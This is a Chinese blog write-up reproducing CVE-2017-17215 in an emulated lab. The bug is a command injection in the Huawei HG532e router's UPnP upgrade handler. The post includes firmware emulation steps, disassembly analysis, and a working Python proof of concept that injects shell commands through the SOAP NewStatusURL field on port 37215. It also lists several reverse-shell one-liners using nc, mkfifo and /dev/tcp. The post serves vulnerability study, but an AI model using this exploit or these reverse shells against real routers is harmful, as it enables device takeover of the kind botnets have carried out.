HG532e命令执行漏洞复现(CVE-2017-17215)

1. 前言

突然发现手里居然还有个华为的路由器固件相关的漏洞复现了没写文章,重新温习下吧。

2. 实验环境

1
2
3
Ubuntu 20.04
IDA Pro 7.5
路由器固件:HG532eV100R001C01B020_upgrade_packet.bin

固件下载地址:

1
https://ia801309.us.archive.org/15/items/RouterHG532e/router%20HG532e.rar

3. 漏洞信息

​ 华为HG532部分定制版本存在远程代码执行漏洞。经过身份验证的攻击者可以向端口 37215 发送恶意数据包来发起攻击。成功利用该漏洞可能会导致远程执行任意代码。

4. 环境模拟

4.1 系统架构

下载固件后,binwalk直接提取文件系统

image-20230911154744344

readelf确定系统架构信息

image-20230911154941212

MIPS大端序,所以模拟环境的时候需要用到qemu-system-mips

先配置tap的虚拟网络吧(关于模拟tap虚拟网络的脚本可以看我之前的文章。)

image-20230911155310379

4.2 system模拟

启动QEMU

1
sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

账密root/root,网络环境构建完成

image-20230911155718756

scp把解压出来的系统文件squashfs-root copy进去

1
sudo scp -r squashfs-root/ root@192.168.7.41:/root/

image-20230911171055538

image-20230911171106639

在虚拟机中挂载procdev目录,因为proc中存储着进程所需的文件,比如pid文件等等,而dev中存储着相关的设备。

1
2
mount -o bind /dev ./squashfs-root/dev
mount -t proc /proc ./squashfs-root/proc

image-20230912093903041

这里新开个ssh端连接QEMU虚拟机,然后启动路由器

image-20230912094355284

image-20230912094421131

这里注意执行chroot命令,将squashfs-root目录作为当前环境的根目录。

这时候回到之前的QEMU终端,发现IP变了,导致我们没办法访问了。

image-20230912094646231

使用命令将我们的IP改回来

1
2
ifconfig br0 192.168.7.2/24 up
ifconfig eth0 192.168.7.41/24 up

image-20230916144844244

其实这里有个很奇怪的问题,我看别的师傅的帖子,eth0网络一开始就是192.168.x.2/24,后面路由器运行后导致IP改变了,也都是给eth0x.2,给br0x.x,然后访问x.2。我就不一样,我从一开始就是自动获取的IP,后面配置访问时也是需要访问br0的IP,而不是师傅们的eth0的IP。。。

奇奇怪怪的问题,因为一开始没文章没写完,虚拟机还不小心关掉了。再次模拟环境的时候,貌似就没上面的问题了,直接按常规配置就能用了。

image-20230912100812526

image-20230912101605844

7.41建立安全连接失败,7.2直接连不上。查了下,貌似是浏览器版本太高的问题,换个低版本的火狐。

1
wget http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/46.0.1/linux-x86_64/en-US/firefox-46.0.1.tar.bz2

image-20230912101211787

下载后可以直接运行里面的firefox

image-20230912145035834

成功访问到路由器。

5. 漏洞原理

5.1 IDA汇编版

根据Check Point的漏洞报告可知,漏洞点位于UPnP服务中。UPnP是路由器中常见的协议,具体信息详见谷歌/百度。

直接将UPnP服务的upnp程序丢到IDA中,然后搜索字符串NewStatusURL,对漏洞点定位

image-20230913115756846

跟踪数据交叉引用

image-20230913115851534

漏洞点如下

image-20230916101416930

ATP_XML_GetChildNodeByName函数定义如下

image-20230916101511498

image-20230916101539699

image-20230916101559306

程序首先进行SOAP XML报文解析,得到元素 NewDownloadURLNewStatusURL 的值。然后进行以下拼接,最终调用system()函数执行。

1
2
3
snprintf($s0, 0x400, 'upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -', NewDownloadURL, NewStatusURL)

system($s0)

5.2 Ghidra伪代码版

github下载Ghidra,记得需要安装个jdk17。

image-20230916115424189

打开后如果你jdk不是17的话,会提醒你输入jdk17的路径。

这里需要你新建个Project,然后直接将upnp这个程序拖进去就可以了。

双击upnp这个文件,开始分析

image-20230916115538557

默认即可

image-20230916115546992

成功载入我们的文件

image-20230916115612045

筛选我们刚才在IDA中看到的字符串

image-20230916115745726

直接默认选项

image-20230916115800111

成功检索到我们的关键字符串

image-20230916115821204

双击字符串,可以看到这个字符串所在函数的地址

image-20230916140111342

定位到函数地址,查看伪代码

image-20230916140507257

可以看到sprinf418414变量直接写入到了1040字符串,未经过任何验证就直接使用system执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int FUN_0040749c(int param_1)

{
  int iVar1;
  int local_418;
  int local_414;
  char acStack_410 [1028];
  
  iVar1 = ATP_XML_GetChildNodeByName(*(undefined4 *)(param_1 + 0x2c),"NewDownloadURL",0,&local_418 );
  if (((iVar1 == 0) && (local_418 != 0)) &&
     (iVar1 = ATP_XML_GetChildNodeByName
                        (*(undefined4 *)(param_1 + 0x2c),"NewStatusURL",0,&local_414), iVar1 == 0) )
  {
    if (local_414 != 0) {
      snprintf(acStack_410,0x400,"upg -g -U %s -t \'1 Firmware Upgrade Image\' -c upnp -r %s -d -b" ,
               local_418,local_414);
      system(acStack_410);
    }
  }
  return iVar1;
}

可以看到程序通过ATP_XML_GetChildNodeByName函数来获取NewDownloadURL节点的内容,然后判断结果是否为空,如果获取成功且结果不为空则继续获取NewStatusURL节点的内容,再判断结果是否空,如果不为空则将NewDownloadURLNewStatusURL节点的内容拼接到字符串,并执行。

5.3 POC

构造POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests 
headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;mkdir hello;</NewStatusURL>
   <NewDownloadURL>;mkdir hellor;</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://192.168.7.41:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

image-20230916145440146

成功通过这两个节点执行命令,分别成功创建了两个文件夹。

5.4 反弹shell

再来试试反弹shell的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests 
headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}

data = '''<?xml version="1.0" ?>
 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
   <NewStatusURL>;nc 192.168.7.38 7777;</NewStatusURL>
   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  </u:Upgrade>
 </s:Body>
</s:Envelope>
'''
requests.post('http://192.168.7.41:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

弹不回来,试了好多都不行。。。

1
2
3
4
5
6
7
8
9
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.7.38 7777 >/tmp/f

nc 192.168.7.38 7777 -e sh

bash -c 'exec bash -i &>/dev/tcp/192.168.7.38/7777 <&1'

TF=$(mktemp -u); mkfifo $TF && telnet 192.168.7.38 7777 0<$TF | /bin sh 1>$TF

sh -i >& /dev/tcp/192.168.7.38/7777 0>&1

放弃挣扎。。。难搞的要死。

参考资料

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
华为路由器-历史漏洞复现
https://xz.aliyun.com/t/12761?accounttraceid=a0140e40e08c45c1b27b324674af75acoaer

华为路由器Huawei HG532漏洞复现过程
https://www.jianshu.com/p/51bfd1208383

路由器命令执行
https://www.secpulse.com/archives/174035.html

华为路由器漏洞CVE-2017-17215复现分析
https://xz.aliyun.com/t/8494

Huawei HG532 系列路由器远程命令执行漏洞分析
https://paper.seebug.org/490/

HUAWEI HOME ROUTERS IN BOTNET RECRUITMENT
https://research.checkpoint.com/good-zero-day-skiddie/
本文作者: foxcookie
发布时间: 2023-09-11
最后更新: 2023-09-26
本文标题: HG532e命令执行漏洞复现(CVE-2017-17215)
本文链接: https://foxcookie.github.io/2023/09/11/HG532e命令执行漏洞复现(CVE-2017-17215)/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处!

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

歪比巴卜?